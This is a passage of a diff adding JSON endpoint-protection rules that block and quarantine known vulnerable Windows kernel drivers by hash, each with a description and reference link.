+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452372Z",
+ "creation_date": "2026-03-23T11:45:30.452375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452385Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ae8d1dd56a8a000ced74a627052933d2e9bff31d251de185b3c0c5fc94a44db",
+ "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5118abca-b500-5eb4-b19b-ca1c98599ba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481326Z",
+ "creation_date": "2026-03-23T11:45:30.481328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc3e8554602c476e2edfa92ba4f6fb2e5ba0db433b9fbd7d8be1036e454d2584",
+ "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5137b3fd-a9e2-5b4a-861d-525c41143668",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158993Z",
+ "creation_date": "2026-03-23T11:45:31.158995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159001Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17ffa8ad0e834375aef70c23e474676b09fc8d3a6dc1a14673dc7865f8e3503d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "513fa4b3-d800-557c-aa84-f5a578980a74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982485Z",
+ "creation_date": "2026-03-23T11:45:29.982487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670",
+ "comment": "Vulnerable Kernel Driver (aka Lurker.sys) [https://www.loldrivers.io/drivers/3fb743b8-d3ed-4873-9c95-e212720dde21/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51457347-9d1a-5489-a768-d4a4b6ab8154",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146313Z",
+ "creation_date": "2026-03-23T11:45:31.146315Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146321Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "772a27f809add1bf474c38286c70ff3dd508c6c1d6feb9fe7e265004ff0cdb19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "514755c6-3832-5226-bd2a-cedd12472bee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147656Z",
+ "creation_date": "2026-03-23T11:45:31.147658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8f74806851f6221c107dc27a0adb75c7d19fd83374afdf2fb6858ba657841b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5149574e-0e49-5858-9d50-8823b9b3dc22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140151Z",
+ "creation_date": "2026-03-23T11:45:31.140154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78a270ee9b994c11ed6295e9f3a24add38c711b1b3af96fed111e04bc2a6bbca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "515217d0-bb8d-56ac-a08f-2a2b2edce24f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816014Z",
+ "creation_date": "2026-03-23T11:45:30.816017Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7de1ce434f957df7bbdf6578dd0bf06ed1269f3cc182802d5c499f5570a85b3a",
+ "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51669b63-d90b-5f2d-868b-87e18dfe8c9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619246Z",
+ "creation_date": "2026-03-23T11:45:29.619248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "516cc22c-7723-5419-a611-c6fe402234c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489376Z",
+ "creation_date": "2026-03-23T11:45:31.489380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2821f21417c3d38468cb924d6caaf3a4f40a9d25d2477c299c7aa84c2ab5fea1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51713de4-e1f2-58d7-85bf-662d7d72bfcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985393Z",
+ "creation_date": "2026-03-23T11:45:29.985395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9199979b9f3ea2108299d028373a6effcc41c81a46eecb430cc6653211d2913d",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5174fd59-99cf-5d49-96fc-3548959033b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454968Z",
+ "creation_date": "2026-03-23T11:45:30.454971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454980Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23115b5b1d5511d59cdad75f863d65893304dc098848dcb149b69492f51b31f6",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51779d72-5f52-576d-9aac-2a5f5129845d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471532Z",
+ "creation_date": "2026-03-23T11:45:31.471536Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84f03b74b9fe26ceed42a64153d127aeae41ff94b5fc86e0484a17e1b2a2a8b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51800cdd-5718-5b84-b5b1-393f6fafc75f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817356Z",
+ "creation_date": "2026-03-23T11:45:31.817358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0e89f000488af2af5872b63c17b0f5fd54b30abf9f93af4c9add231ccaecfab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "518d211c-4eac-5f66-a818-d9c7484d4dc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494328Z",
+ "creation_date": "2026-03-23T11:45:31.494331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dd18f32fbffb03a0eeb33782a5b239673597f85b195273894d33013643e3242",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "518e89ba-b3ce-5c8b-8c53-68f1bfd9e121",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607400Z",
+ "creation_date": "2026-03-23T11:45:29.607402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9bc6b2d5822c5b3a7b1023adceb25b47b41e664347860be4603ee81b644590e",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5193f4ad-67cb-5800-a8ef-45bea3467d63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615815Z",
+ "creation_date": "2026-03-23T11:45:29.615817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21a6689456d9833453d5247e4c5faf13edcd4835408e033c40ae1a225711ae8f",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51a0901e-5abd-5304-96e9-1a6b1fbaeec4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974730Z",
+ "creation_date": "2026-03-23T11:45:29.974732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ffbb534c73106a2879d5a9d4ad3436c8d3ab8ac6aa8b217e26a6492fa1d16d0",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51a615f9-acb9-5db7-b511-36a78b3cf2e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141803Z",
+ "creation_date": "2026-03-23T11:45:31.141805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6b6b0e4850caa2f5f75de0667d758e420b33bda452c21d9cdf6ff29300f84f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51aef40b-a6af-5853-8386-18c0ea344fca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820634Z",
+ "creation_date": "2026-03-23T11:45:30.820636Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dee384604d2d0018473941acbefe553711ded7344a4932daeffb876fe2fa0233",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51b245a9-91b3-56b9-9410-f60cd227cf4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615362Z",
+ "creation_date": "2026-03-23T11:45:29.615364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf3ec8972720f84d73e907bb293de40468a0d605ce0da658a786f7b4842b3c62",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51b8638c-1275-5875-9018-7c2e4125e056",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829786Z",
+ "creation_date": "2026-03-23T11:45:31.829789Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffc46be50708610ec4f477ca2813d6888eb60dc9b3677ea173496b68948b33c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51bbddf6-fc33-51c0-8ecc-ed449ac50690",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492019Z",
+ "creation_date": "2026-03-23T11:45:31.492021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
